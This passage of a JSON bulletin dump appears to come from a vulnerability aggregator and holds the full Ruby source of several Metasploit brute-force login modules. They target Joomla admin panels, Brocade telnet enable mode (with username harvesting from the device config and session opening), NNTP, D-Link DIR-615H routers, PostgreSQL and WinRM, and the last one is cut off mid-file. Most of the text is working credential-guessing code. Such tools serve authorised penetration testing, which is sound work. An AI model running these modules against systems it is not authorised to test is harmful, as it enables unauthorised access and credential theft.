'/administrator/index.php']),\n OptString.new('FORM_URI', [true, 'The FORM URI to authenticate against' , '/administrator']),\n OptString.new('USER_VARIABLE', [true, 'The name of the variable for the user field', 'username']),\n OptString.new('PASS_VARIABLE', [true, 'The name of the variable for the password field' , 'passwd']),\n OptString.new('WORD_ERROR', [true, 'The word of message for detect that login fail', 'mod-login-username'])\n ])\n\n register_autofilter_ports([80, 443])\n end\n\n def find_auth_uri\n if datastore['AUTH_URI'] && datastore['AUTH_URI'].length > 0\n paths = [datastore['AUTH_URI']]\n else\n paths = %w(\n /\n /administrator/\n )\n end\n\n paths.each do |path|\n begin\n res = send_request_cgi(\n 'uri' => path,\n 'method' => 'GET'\n )\n rescue ::Rex::ConnectionError\n next\n end\n\n next unless res\n\n if res.redirect? && res.headers['Location'] && res.headers['Location'] !~ /^http/\n path = res.headers['Location']\n vprint_status(\"#{rhost}:#{rport} - Following redirect: #{path}\")\n begin\n res = send_request_cgi(\n 'uri' => path,\n 'method' => 'GET'\n )\n rescue ::Rex::ConnectionError\n next\n end\n next unless res\n end\n\n return path\n end\n\n nil\n end\n\n def target_url\n proto = 'http'\n if rport == 443 || ssl\n proto = 'https'\n end\n \"#{proto}://#{rhost}:#{rport}#{@uri}\"\n end\n\n def run_host(ip)\n vprint_status(\"#{rhost}:#{rport} - Searching Joomla authentication URI...\")\n @uri = find_auth_uri\n\n unless @uri\n vprint_error(\"#{rhost}:#{rport} - No URI found that asks for authentication\")\n return\n end\n\n @uri = \"/#{@uri}\" if @uri[0, 1] != '/'\n\n vprint_status(\"#{target_url} - Attempting to login...\")\n\n each_user_pass do |user, pass|\n do_login(user, pass)\n end\n end\n\n def report_cred(opts)\n service_data = {\n address: opts[:ip],\n port: opts[:port],\n service_name: (ssl ? 'https' : 'http'),\n protocol: 'tcp',\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :service,\n module_fullname: fullname,\n username: opts[:user],\n private_data: opts[:password],\n private_type: :password\n }.merge(service_data)\n\n login_data = {\n last_attempted_at: DateTime.now,\n core: create_credential(credential_data),\n status: Metasploit::Model::Login::Status::SUCCESSFUL,\n proof: opts[:proof]\n }.merge(service_data)\n\n create_credential_login(login_data)\n end\n\n def do_login(user, pass)\n vprint_status(\"#{target_url} - Trying username:'#{user}' with password:'#{pass}'\")\n response = do_web_login(user, pass)\n result = determine_result(response)\n\n if result == :success\n print_good(\"#{target_url} - Successful login '#{user}' : '#{pass}'\")\n report_cred(ip: rhost, port: rport, user: user, password: pass, proof: response.inspect)\n return :abort if datastore['STOP_ON_SUCCESS']\n return :next_user\n else\n vprint_error(\"#{target_url} - Failed to login as '#{user}'\")\n return\n end\n end\n\n def do_web_login(user, pass)\n user_var = datastore['USER_VARIABLE']\n pass_var = datastore['PASS_VARIABLE']\n\n referer_var = \"http://#{rhost}/administrator/index.php\"\n\n vprint_status(\"#{target_url} - Searching Joomla Login Response...\")\n res = login_response\n\n unless res && res.code = 200 && !res.get_cookies.blank?\n vprint_error(\"#{target_url} - Failed to find Joomla Login Response\")\n return nil\n end\n\n vprint_status(\"#{target_url} - Searching Joomla Login Form...\")\n hidden_value = get_login_hidden(res)\n if hidden_value.nil?\n vprint_error(\"#{target_url} - Failed to find Joomla Login Form\")\n return nil\n end\n\n vprint_status(\"#{target_url} - Searching Joomla Login Cookies...\")\n cookie = get_login_cookie(res)\n if cookie.blank?\n vprint_error(\"#{target_url} - Failed to find Joomla Login Cookies\")\n return nil\n end\n\n vprint_status(\"#{target_url} - Login with cookie ( #{cookie} ) and Hidden ( #{hidden_value}=1 )\")\n res = send_request_login(\n 'user_var' => user_var,\n 'pass_var' => pass_var,\n 'cookie' => cookie,\n 'referer_var' => referer_var,\n 'user' => user,\n 'pass' => pass,\n 'hidden_value' => hidden_value\n )\n\n if res\n vprint_status(\"#{target_url} - Login Response #{res.code}\")\n if res.redirect? && res.headers['Location']\n path = res.headers['Location']\n vprint_status(\"#{target_url} - Following redirect to #{path}...\")\n\n res = send_request_raw(\n 'uri' => path,\n 'method' => 'GET',\n 'cookie' => \"#{cookie}\"\n )\n end\n end\n\n return res\n rescue ::Rex::ConnectionError\n vprint_error(\"#{target_url} - Failed to connect to the web server\")\n return nil\n end\n\n def send_request_login(opts = {})\n res = send_request_cgi(\n 'uri' => @uri,\n 'method' => 'POST',\n 'cookie' => \"#{opts['cookie']}\",\n 'headers' =>\n {\n 'Referer' => opts['referer_var']\n },\n 'vars_post' => {\n opts['user_var'] => opts['user'],\n opts['pass_var'] => opts['pass'],\n 'lang' => '',\n 'option' => 'com_login',\n 'task' => 'login',\n 'return' => 'aW5kZXgucGhw',\n opts['hidden_value'] => 1\n }\n )\n\n res\n end\n\n def determine_result(response)\n return :abort unless response.kind_of?(Rex::Proto::Http::Response)\n return :abort unless response.code\n\n if [200, 301, 302].include?(response.code)\n if response.to_s.include?(datastore['WORD_ERROR'])\n return :fail\n else\n return :success\n end\n end\n\n :fail\n end\n\n def login_response\n uri = normalize_uri(datastore['FORM_URI'])\n res = send_request_cgi!('uri' => uri, 'method' => 'GET')\n\n res\n end\n\n def get_login_cookie(res)\n return nil unless res.kind_of?(Rex::Proto::Http::Response)\n\n res.get_cookies\n end\n\n def get_login_hidden(res)\n return nil unless res.kind_of?(Rex::Proto::Http::Response)\n\n return nil if res.body.blank?\n\n vprint_status(\"#{target_url} - Testing Joomla 2.5 Form...\")\n form = res.body.split(/<form action=([^\\>]+) method=\"post\" id=\"form-login\"\\>(.*)<\\/form>/mi)\n\n if form.length == 1 # is not Joomla 2.5\n vprint_status(\"#{target_url} - Testing Form Joomla 3.0 Form...\")\n form = res.body.split(/<form action=([^\\>]+) method=\"post\" id=\"form-login\" class=\"form-inline\"\\>(.*)<\\/form>/mi)\n end\n\n if form.length == 1 # is not Joomla 3\n vprint_error(\"#{target_url} - Last chance to find a login form...\")\n form = res.body.split(/<form id=\"login-form\" action=([^\\>]+)\\>(.*)<\\/form>/mi)\n end\n\n begin\n input_hidden = form[2].split(/<input type=\"hidden\"([^\\>]+)\\/>/mi)\n input_id = input_hidden[7].split(\"\\\"\")\n rescue NoMethodError\n return nil\n end\n\n valor_input_id = input_id[1]\n\n valor_input_id\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/http/joomla_bruteforce_login.rb"}, {"lastseen": "2018-09-20T01:57:59", "_object_types": ["robots.models.metasploit.MetasploitBulletin", "robots.models.base.Bulletin"], "references": [], "description": "This module will test a range of Brocade network devices for a privileged logins and report successes. The device authentication mode must be set as 'aaa authentication enable default local'. Telnet authentication, e.g. 'enable telnet authentication', should not be enabled in the device configuration. This module has been tested against the following devices: ICX6450-24 SWver 07.4.00bT311, FastIron WS 624 SWver 07.2.02fT7e1", "reporter": "Rapid7", "published": "1976-01-01T00:00:00", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/telnet/brocade_enable_login.rb", "type": "metasploit", "title": "Brocade Enable Login Check Scanner", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "exploit", "cvelist": ["CVE-1999-0502"], "_object_type": "robots.models.metasploit.MetasploitBulletin", "modified": "1976-01-01T00:00:00", "metasploitReliability": "Normal", "id": "MSF:AUXILIARY/SCANNER/TELNET/BROCADE_ENABLE_LOGIN", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'metasploit/framework/credential_collection'\nrequire 'metasploit/framework/login_scanner/telnet'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Telnet\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::AuthBrute\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::CommandShell\n\n def initialize\n super(\n 'Name' => 'Brocade Enable Login Check Scanner',\n 'Description' => %q{\n This module will test a range of Brocade network devices for a\n privileged logins and report successes. The device authentication mode\n must be set as 'aaa authentication enable default local'.\n Telnet authentication, e.g. 'enable telnet authentication', should not\n be enabled in the device configuration.\n\n This module has been tested against the following devices:\n ICX6450-24 SWver 07.4.00bT311,\n FastIron WS 624 SWver 07.2.02fT7e1\n },\n 'Author' => 'h00die <mike[at]shorebreaksecurity.com>',\n 'References' =>\n [\n [ 'CVE', '1999-0502'] # Weak password\n ],\n 'License' => MSF_LICENSE\n )\n register_options(\n [\n OptBool.new('GET_USERNAMES_FROM_CONFIG', [ false, 'Pull usernames from config and running config', true])\n ], self.class\n )\n @no_pass_prompt = []\n end\n\n def get_username_from_config(un_list,ip)\n [\"config\", \"running-config\"].each do |command|\n print_status(\" Attempting username gathering from #{command} on #{ip}\")\n sock.puts(\"\\r\\n\") # ensure that the buffer is clear\n config = sock.recv(1024)\n sock.puts(\"show #{command}\\r\\n\")\n\n # pull the entire config\n while true do\n sock.puts(\" \\r\\n\") # paging\n config << sock.recv(1024)\n # Read until we are back at a prompt and have received the 'end' of\n # the config.\n break if config.match(/>$/) and config.match(/end/)\n end\n\n config.each_line do |un|\n if un.match(/^username/)\n found_username = un.split(\" \")[1].strip\n un_list.push(found_username)\n print_status(\" Found: #{found_username}@#{ip}\")\n end\n end\n end\n end\n\n attr_accessor :no_pass_prompt\n attr_accessor :password_only\n\n def run_host(ip)\n un_list = []\n if datastore['GET_USERNAMES_FROM_CONFIG']\n connect()\n get_username_from_config(un_list,ip)\n disconnect()\n end\n\n if datastore['USERNAME'] #put the provided username on the array to try\n un_list.push(datastore['USERNAME'])\n end\n\n un_list.delete('logout') #logout, even when used as a un or pass will exit the terminal\n\n un_list.each do |un|\n cred_collection = Metasploit::Framework::CredentialCollection.new(\n blank_passwords: datastore['BLANK_PASSWORDS'],\n pass_file: datastore['PASS_FILE'],\n password: datastore['PASSWORD'],\n user_file: datastore['USER_FILE'],\n userpass_file: datastore['USERPASS_FILE'],\n username: un,\n user_as_pass: datastore['USER_AS_PASS'],\n )\n\n cred_collection = prepend_db_passwords(cred_collection)\n\n scanner = Metasploit::Framework::LoginScanner::Telnet.new(\n host: ip,\n port: rport,\n proxies: datastore['PROXIES'],\n cred_details: cred_collection,\n stop_on_success: datastore['STOP_ON_SUCCESS'],\n bruteforce_speed: datastore['BRUTEFORCE_SPEED'],\n connection_timeout: datastore['Timeout'],\n max_send_size: datastore['TCP::max_send_size'],\n send_delay: datastore['TCP::send_delay'],\n banner_timeout: datastore['TelnetBannerTimeout'],\n telnet_timeout: datastore['TelnetTimeout'],\n pre_login: lambda { |s| raw_send(\"enable\\r\\n\", s.sock) },\n framework: framework,\n framework_module: self,\n ssl: datastore['SSL'],\n ssl_version: datastore['SSLVersion'],\n ssl_verify_mode: datastore['SSLVerifyMode'],\n ssl_cipher: datastore['SSLCipher'],\n local_port: datastore['CPORT'],\n local_host: datastore['CHOST']\n )\n\n scanner.scan! do |result|\n credential_data = result.to_h\n credential_data.merge!(\n module_fullname: self.fullname,\n workspace_id: myworkspace_id\n )\n\n if result.success?\n credential_core = create_credential(credential_data)\n credential_data[:core] = credential_core\n create_credential_login(credential_data)\n print_good(\"#{ip}:#{rport} - Login Successful: #{result.credential}\")\n start_telnet_session(ip,rport,result.credential.public,result.credential.private,scanner)\n else\n invalidate_login(credential_data)\n print_error(\"#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})\")\n end\n end\n end\n end\n\n def start_telnet_session(host, port, user, pass, scanner)\n print_status(\"Attempting to start session #{host}:#{port} with #{user}:#{pass}\")\n merge_me = {\n 'USERPASS_FILE' => nil,\n 'USER_FILE' => nil,\n 'PASS_FILE' => nil,\n 'USERNAME' => user,\n 'PASSWORD' => pass\n }\n\n start_session(self, \"TELNET #{user}:#{pass} (#{host}:#{port})\", merge_me, true, scanner.sock)\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/telnet/brocade_enable_login.rb"}, {"lastseen": "2018-09-02T03:48:57", "_object_types": ["robots.models.base.Bulletin", "robots.models.metasploit.MetasploitBulletin"], "references": [], "description": "This module attempts to authenticate to NNTP services which support the AUTHINFO authentication extension. This module supports AUTHINFO USER/PASS authentication, but does not support AUTHINFO GENERIC or AUTHINFO SASL authentication methods.", "reporter": "Rapid7", "published": "2017-06-15T20:25:40", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/nntp/nntp_login.rb", "type": "metasploit", "title": "NNTP Login Utility", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-1999-0502"], "_object_type": "robots.models.metasploit.MetasploitBulletin", "modified": "2017-07-24T13:26:21", "metasploitReliability": "Normal", "id": "MSF:AUXILIARY/SCANNER/NNTP/NNTP_LOGIN", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::AuthBrute\n include Msf::Auxiliary::Scanner\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'NNTP Login Utility',\n 'Description' => %q{\n This module attempts to authenticate to NNTP services\n which support the AUTHINFO authentication extension.\n\n This module supports AUTHINFO USER/PASS authentication,\n but does not support AUTHINFO GENERIC or AUTHINFO SASL\n authentication methods.\n },\n 'Author' => 'Brendan Coles <bcoles[at]gmail.com>',\n 'License' => MSF_LICENSE,\n 'References' => [ [ 'CVE', '1999-0502' ], # Weak password\n [ 'URL', 'https://tools.ietf.org/html/rfc3977' ],\n [ 'URL', 'https://tools.ietf.org/html/rfc4642' ],\n [ 'URL', 'https://tools.ietf.org/html/rfc4643' ] ]))\n register_options(\n [\n Opt::RPORT(119),\n OptPath.new('USER_FILE', [ false, 'The file that contains a list of probable usernames.',\n File.join(Msf::Config.install_root, 'data', 'wordlists', 'unix_users.txt') ]),\n OptPath.new('PASS_FILE', [ false, 'The file that contains a list of probable passwords.',\n File.join(Msf::Config.install_root, 'data', 'wordlists', 'unix_passwords.txt') ])\n ])\n deregister_options 'RHOST'\n end\n\n def run_host(ip)\n begin\n connect\n return :abort unless nntp?\n return :abort unless supports_authinfo?\n\n report_service :host => rhost,\n :port => rport,\n :proto => 'tcp',\n :name => 'nntp'\n disconnect\n\n each_user_pass { |user, pass| do_login user, pass }\n rescue ::Interrupt\n raise $ERROR_INFO\n rescue EOFError, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout\n print_error \"#{peer} Connection failed\"\n return\n rescue OpenSSL::SSL::SSLError => e\n print_error \"SSL negotiation failed: #{e}\"\n rescue => e\n print_error \"#{peer} Error: #{e.class} #{e} #{e.backtrace}\"\n return\n ensure\n disconnect\n end\n end\n\n def nntp?\n banner = sock.get_once\n\n if !banner\n vprint_error \"#{peer} No response\"\n return false\n end\n\n if banner !~ /^200/\n print_error 'Unexpected reply'\n return false\n end\n\n vprint_status 'Server is a NTTP server'\n vprint_status \"Banner: #{banner}\"\n true\n end\n\n def supports_authinfo?\n sock.put \"HELP\\r\\n\"\n res = sock.get(-1)\n code = res.scan(/\\A(\\d+)\\s/).flatten.first.to_i\n\n if code.nil?\n print_error 'Server is not a NNTP server'\n return false\n end\n\n if code == 480\n vprint_warning 'Authentication is required before listing authentication capabilities.'\n return true\n end\n\n if code == 100 && res =~ /authinfo/i\n vprint_status 'Server supports AUTHINFO'\n return true\n end\n\n print_error 'Server does not support AUTHINFO'\n false\n end\n\n def do_login(user, pass)\n vprint_status \"Trying username:'#{user}' with password:'#{pass}'\"\n\n begin\n connect\n sock.get_once\n\n sock.put \"AUTHINFO USER #{user}\\r\\n\"\n res = sock.get_once\n unless res\n vprint_error \"#{peer} No response\"\n return :abort\n end\n\n code = res.scan(/\\A(\\d+)\\s/).flatten.first.to_i\n if code != 381\n vprint_error \"#{peer} Unexpected reply. Skipping user...\"\n return :skip_user\n end\n\n sock.put \"AUTHINFO PASS #{pass}\\r\\n\"\n res = sock.get_once\n unless res\n vprint_error \"#{peer} No response\"\n return :abort\n end\n\n code = res.scan(/\\A(\\d+)\\s/).flatten.first.to_i\n if code == 452 || code == 481\n vprint_error \"#{peer} Login failed\"\n return\n elsif code == 281\n print_good \"#{peer} Successful login with: '#{user}' : '#{pass}'\"\n report_cred ip: rhost,\n port: rport,\n service_name: 'nntp',\n user: user,\n password: pass,\n proof: code.to_s\n return :next_user\n else\n vprint_error \"#{peer} Failed login as: '#{user}' - Unexpected reply: #{res.inspect}\"\n return\n end\n rescue EOFError, ::Rex::ConnectionError, ::Errno::ECONNREFUSED, ::Errno::ETIMEDOUT\n print_error 'Connection failed'\n return\n rescue OpenSSL::SSL::SSLError => e\n print_error \"SSL negotiation failed: #{e}\"\n return :abort\n end\n rescue => e\n print_error \"Error: #{e}\"\n return nil\n ensure\n disconnect\n end\n\n def report_cred(opts)\n service_data = { address: opts[:ip],\n port: opts[:port],\n service_name: opts[:service_name],\n protocol: 'tcp',\n workspace_id: myworkspace_id }\n\n credential_data = { origin_type: :service,\n module_fullname: fullname,\n username: opts[:user],\n private_data: opts[:password],\n private_type: :password }.merge service_data\n\n login_data = { last_attempted_at: DateTime.now,\n core: create_credential(credential_data),\n status: Metasploit::Model::Login::Status::SUCCESSFUL,\n proof: opts[:proof] }.merge service_data\n\n create_credential_login login_data\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/nntp/nntp_login.rb"}, {"lastseen": "2018-02-04T08:23:07", "_object_types": ["robots.models.base.Bulletin", "robots.models.metasploit.MetasploitBulletin"], "references": [], "description": "This module attempts to authenticate to different D-Link HTTP management services. It has been tested successfully on D-Link DIR-615 Hardware revision H devices. It is possible that this module also works with other models.", "reporter": "Rapid7", "published": "2013-03-27T08:26:23", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/http/dlink_dir_615h_http_login.rb", "type": "metasploit", "title": "D-Link DIR-615H HTTP Login Utility", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-1999-0502"], "_object_type": "robots.models.metasploit.MetasploitBulletin", "modified": "2017-07-24T13:26:21", "metasploitReliability": "Normal", "id": "MSF:AUXILIARY/SCANNER/HTTP/DLINK_DIR_615H_HTTP_LOGIN", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::AuthBrute\n\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'D-Link DIR-615H HTTP Login Utility',\n 'Description' => %q{\n This module attempts to authenticate to different D-Link HTTP management\n services. It has been tested successfully on D-Link DIR-615 Hardware revision H\n devices. It is possible that this module also works with other models.\n },\n 'Author' => [\n 'hdm', #http_login module\n 'Michael Messner <devnull[at]s3cur1ty.de>' #dlink login included\n ],\n 'References' =>\n [\n [ 'CVE', '1999-0502'] # Weak password\n ],\n 'License' => MSF_LICENSE\n )\n\n register_options(\n [\n OptString.new('USERNAME', [ false, \"Username for authentication (default: admin)\",\"admin\" ]),\n OptPath.new('PASS_FILE', [ false, \"File containing passwords, one per line\",\n File.join(Msf::Config.data_directory, \"wordlists\", \"http_default_pass.txt\") ]),\n ])\n\n deregister_options('HttpUsername', 'HttpPassword')\n end\n\n def target_url\n proto = \"http\"\n if rport == 443 or ssl\n proto = \"https\"\n end\n \"#{proto}://#{rhost}:#{rport}#{@uri.to_s}\"\n end\n\n def run_host(ip)\n\n @uri = \"/login.htm\"\n\n if is_dlink?\n vprint_good(\"#{target_url} - D-Link device detected\")\n else\n vprint_error(\"#{target_url} - D-Link device doesn't detected\")\n return\n end\n\n print_status(\"#{target_url} - Attempting to login\")\n\n each_user_pass { |user, pass|\n do_login(user, pass)\n }\n end\n\n def is_dlink?\n # the tested DIR-615 has no nice Server banner, gconfig.htm gives us interesting\n # input to detect this device. Not sure if this works on other devices! Tested on v8.04.\n begin\n response = send_request_cgi({\n 'uri' => '/gconfig.htm',\n 'method' => 'GET',\n }\n )\n return false if response.nil?\n return false if (response.code == 404)\n\n # fingerprinting tested on firmware version 8.04\n if response.body !~ /var\\ systemName\\=\\'DLINK\\-DIR615/\n return false\n else\n return true\n end\n rescue ::Rex::ConnectionError\n vprint_error(\"#{target_url} - Failed to connect to the web server\")\n return nil\n end\n end\n\n # default to user=admin without password (default on most dlink routers)\n def do_login(user='admin', pass='')\n vprint_status(\"#{target_url} - Trying username:'#{user}' with password:'#{pass}'\")\n\n response = do_http_login(user,pass)\n result = determine_result(response)\n\n if result == :success\n print_good(\"#{target_url} - Successful login '#{user}' : '#{pass}'\")\n\n report_cred(ip: rhost, port: rport, user: user, password: pass, proof: response.inspect)\n\n return :next_user\n else\n vprint_error(\"#{target_url} - Failed to login as '#{user}'\")\n return\n end\n end\n\n def report_cred(opts)\n service_data = {\n address: opts[:ip],\n port: opts[:port],\n service_name: (ssl ? 'https' : 'http'),\n protocol: 'tcp',\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :service,\n module_fullname: fullname,\n username: opts[:user],\n private_data: opts[:password],\n private_type: :password\n }.merge(service_data)\n\n login_data = {\n last_attempted_at: DateTime.now,\n core: create_credential(credential_data),\n status: Metasploit::Model::Login::Status::SUCCESSFUL,\n proof: opts[:proof]\n }.merge(service_data)\n\n create_credential_login(login_data)\n end\n\n def do_http_login(user,pass)\n begin\n response = send_request_cgi({\n 'uri' => @uri,\n 'method' => 'POST',\n 'vars_post' => {\n \"page\" => \"login\",\n \"submitType\" => \"0\",\n \"identifier\" => \"\",\n \"sel_userid\" => user,\n \"userid\" => \"\",\n \"passwd\" => pass,\n \"captchapwd\" => \"\"\n }\n })\n return if response.nil?\n return if (response.code == 404)\n\n return response\n rescue ::Rex::ConnectionError\n vprint_error(\"#{target_url} - Failed to connect to the web server\")\n return nil\n end\n end\n\n def determine_result(response)\n return :abort if response.nil?\n return :abort unless response.kind_of? Rex::Proto::Http::Response\n return :abort unless response.code\n if response.body =~ /\\<script\\ langauge\\=\\\"javascript\\\"\\>showMainTabs\\(\\\"setup\\\"\\)\\;\\<\\/script\\>/\n return :success\n end\n return :fail\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/http/dlink_dir_615h_http_login.rb"}, {"lastseen": "2017-11-01T01:41:30", "_object_types": ["robots.models.base.Bulletin", "robots.models.metasploit.MetasploitBulletin"], "references": [], "description": "This module attempts to authenticate against a PostgreSQL instance using username and password combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options. Note that passwords may be either plaintext or MD5 formatted hashes.", "reporter": "Rapid7", "published": "2010-03-25T01:05:23", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/postgres/postgres_login.rb", "type": "metasploit", "title": "PostgreSQL Login Utility", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "bulletinFamily": "exploit", "cvelist": ["CVE-1999-0502"], "_object_type": "robots.models.metasploit.MetasploitBulletin", "modified": "2017-07-24T13:26:21", "metasploitReliability": "Normal", "id": "MSF:AUXILIARY/SCANNER/POSTGRES/POSTGRES_LOGIN", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'metasploit/framework/credential_collection'\nrequire 'metasploit/framework/login_scanner/postgres'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Postgres\n include Msf::Auxiliary::AuthBrute\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n # Creates an instance of this module.\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PostgreSQL Login Utility',\n 'Description' => %q{\n This module attempts to authenticate against a PostgreSQL\n instance using username and password combinations indicated\n by the USER_FILE, PASS_FILE, and USERPASS_FILE options. Note that\n passwords may be either plaintext or MD5 formatted hashes.\n },\n 'Author' => [ 'todb' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'URL', 'http://www.postgresql.org' ],\n [ 'CVE', '1999-0502'], # Weak password\n [ 'URL', 'https://hashcat.net/forum/archive/index.php?thread-4148.html' ] # Pass the Hash\n ]\n ))\n\n register_options(\n [\n Opt::Proxies,\n OptPath.new('USERPASS_FILE', [ false, \"File containing (space-seperated) users and passwords, one pair per line\",\n File.join(Msf::Config.data_directory, \"wordlists\", \"postgres_default_userpass.txt\") ]),\n OptPath.new('USER_FILE', [ false, \"File containing users, one per line\",\n File.join(Msf::Config.data_directory, \"wordlists\", \"postgres_default_user.txt\") ]),\n OptPath.new('PASS_FILE', [ false, \"File containing passwords, one per line\",\n File.join(Msf::Config.data_directory, \"wordlists\", \"postgres_default_pass.txt\") ]),\n ])\n\n deregister_options('SQL')\n\n end\n\n # Loops through each host in turn. Note the current IP address is both\n # ip and datastore['RHOST']\n def run_host(ip)\n cred_collection = Metasploit::Framework::CredentialCollection.new(\n blank_passwords: datastore['BLANK_PASSWORDS'],\n pass_file: datastore['PASS_FILE'],\n password: datastore['PASSWORD'],\n user_file: datastore['USER_FILE'],\n userpass_file: datastore['USERPASS_FILE'],\n username: datastore['USERNAME'],\n user_as_pass: datastore['USER_AS_PASS'],\n realm: datastore['DATABASE']\n )\n\n cred_collection = prepend_db_passwords(cred_collection)\n\n scanner = Metasploit::Framework::LoginScanner::Postgres.new(\n host: ip,\n port: rport,\n proxies: datastore['PROXIES'],\n cred_details: cred_collection,\n stop_on_success: datastore['STOP_ON_SUCCESS'],\n bruteforce_speed: datastore['BRUTEFORCE_SPEED'],\n connection_timeout: 30,\n framework: framework,\n framework_module: self,\n )\n\n scanner.scan! do |result|\n credential_data = result.to_h\n credential_data.merge!(\n module_fullname: self.fullname,\n workspace_id: myworkspace_id\n )\n if result.success?\n credential_core = create_credential(credential_data)\n credential_data[:core] = credential_core\n create_credential_login(credential_data)\n\n print_good \"#{ip}:#{rport} - Login Successful: #{result.credential}\"\n else\n invalidate_login(credential_data)\n vprint_error \"#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status}: #{result.proof})\"\n end\n end\n\n end\n\n # Alias for RHOST\n def rhost\n datastore['RHOST']\n end\n\n # Alias for RPORT\n def rport\n datastore['RPORT']\n end\n\n\n\nend\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/postgres/postgres_login.rb"}, {"lastseen": "2018-09-05T03:58:30", "_object_types": ["robots.models.metasploit.MetasploitBulletin", "robots.models.base.Bulletin"], "references": [], "description": "This module attempts to authenticate to a WinRM service. It currently works only if the remote end allows Negotiate(NTLM) authentication. Kerberos is not currently supported. Please note: in order to use this module without SSL, the 'AllowUnencrypted' winrm option must be set. Otherwise adjust the port and set the SSL options in the module as appropriate.", "reporter": "Rapid7", "published": "2012-10-25T15:16:12", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/winrm/winrm_login.rb", "type": "metasploit", "title": "WinRM Login Utility", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-1999-0502"], "_object_type": "robots.models.metasploit.MetasploitBulletin", "modified": "2017-07-24T13:26:21", "metasploitReliability": "Normal", "id": "MSF:AUXILIARY/SCANNER/WINRM/WINRM_LOGIN", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/ntlm/message'\nrequire 'metasploit/framework/credential_collection'\nrequire 'metasploit/framework/login_scanner'\nrequire 'metasploit/framework/login_scanner/winrm'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::WinRM\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::AuthBrute\n\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'WinRM Login Utility',\n 'Description' => %q{\n This module attempts to authenticate to a WinRM service. It currently\n works only if the remote end allows Negotiate(NTLM) authentication.\n Kerberos is not currently supported. Please note: in order to use this\n module without SSL, the 'AllowUnencrypted' winrm option must be set.\n Otherwise adjust the port and set the SSL options in the module as appropriate.\n },\n 'Author' => [ 'thelightcosine' ],\n 'References' =>\n [\n [ 'CVE', '1999-0502'] # Weak password\n ],\n 'License' => MSF_LICENSE\n )\n end\n\n\n def run_host(ip)\n cred_collection = Metasploit::Framework::CredentialCollection.new(\n blank_passwords: datastore['BLANK_PASSWORDS'],\n pass_file: datastore['PASS_FILE'],\n password: datastore['PASSWORD'],\n user_file: datastore['USER_FILE'],\n userpass_file: datastore['USERPASS_FILE'],\n username: datastore['USERNAME'],\n user_as_pass: datastore['USER_AS_PASS'],\n realm: datastore['DOMAIN'],\n 